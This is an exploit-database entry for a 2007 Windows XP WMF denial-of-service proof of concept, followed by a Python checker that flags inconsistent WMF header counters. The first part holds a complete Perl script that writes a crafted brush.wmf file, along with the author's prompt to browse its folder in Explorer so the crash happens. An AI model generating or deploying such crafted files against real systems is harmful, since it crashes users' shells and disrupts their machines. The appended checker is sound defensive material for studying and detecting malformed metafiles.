vendor: Windows XP
by: cyanid-E
CVSS: 5.5 (MEDIUM)
Denial of Service
CWE: 200
Product Name: Windows XP
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP
2007

WMF PoC denial of service exploit

This is a proof-of-concept exploit for a denial of service vulnerability in Windows Metafile Format (WMF) files. It generates a malicious WMF file that can cause the Windows Explorer in Windows XP to crash when browsing a folder containing the file.

Mitigation:

There is no specific mitigation mentioned in the text.
Source

Exploit-DB raw data:

#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

# milw0rm.com [2007-01-13]
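
A defender-side structural check for WMF files before they reach a folder that Explorer will render, added here as an example; it is not part of the original entry or the exploit author's code. The page does not say which field triggers the crash, so the check only compares the header counters with the records actually present (in the PoC above, the header bytes after the size field spell the author's handle where those counters belong). It assumes the standard 18-byte MS-WMF header layout; `check_wmf`, `build_wmf` and the sample blobs are constructed for illustration.

```python
import struct

# MS-WMF record functions that create a graphics object.
CREATORS = {0x00F7, 0x0142, 0x01F9, 0x02FA, 0x02FB, 0x02FC, 0x06FF}
META_EOF = 0x0000
HEADER = "<HHHIHIH"  # Type, HeaderSize, Version, Size, NumberOfObjects, MaxRecord, NumberOfMembers

def check_wmf(data):
    """Return structural findings for a WMF byte string; [] means none found."""
    data = data[22:] if data[:4] == b"\xd7\xcd\xc6\x9a" else data  # skip placeable header
    if len(data) < 18:
        return ["truncated header"]
    ftype, hdr_words, version, size_words, n_objects, max_record, _ = \
        struct.unpack_from(HEADER, data)
    if ftype not in (1, 2) or hdr_words != 9 or version not in (0x0100, 0x0300):
        return ["not a WMF header"]
    findings = [] if size_words * 2 == len(data) else ["declared size != file size"]
    pos, largest, creates, saw_eof = 18, 0, 0, False
    while pos + 6 <= len(data) and not saw_eof:
        rec_words, func = struct.unpack_from("<IH", data, pos)
        if rec_words < 3 or pos + rec_words * 2 > len(data):
            findings.append(f"bad record size at offset {pos}")
            break
        largest = max(largest, rec_words)
        creates += func in CREATORS
        saw_eof = func == META_EOF
        pos += rec_words * 2
    if not saw_eof:
        findings.append("no META_EOF record")
    if max_record != largest:
        findings.append("header MaxRecord != largest record")
    if n_objects > creates:
        findings.append("header NumberOfObjects > object-creating records")
    return findings

def build_wmf(records, n_objects, max_record):
    """Constructed-sample builder; records is a list of (function, parameter bytes)."""
    body = b"".join(struct.pack("<IH", 3 + len(p) // 2, f) + p for f, p in records)
    return struct.pack(HEADER, 1, 9, 0x0300, (18 + len(body)) // 2,
                       n_objects, max_record, 0) + body

# Constructed inputs: one CreatePenIndirect record (10 parameter bytes), then EOF.
RECORDS = [(0x02FA, bytes(10)), (META_EOF, b"")]
CLEAN = build_wmf(RECORDS, n_objects=1, max_record=8)
INFLATED = build_wmf(RECORDS, n_objects=0x7000, max_record=0x60000000)

if __name__ == "__main__":
    print("clean:", check_wmf(CLEAN), "inflated:", check_wmf(INFLATED))
```

A finding marks a file for quarantine or closer inspection; an empty list only means these particular consistency checks passed.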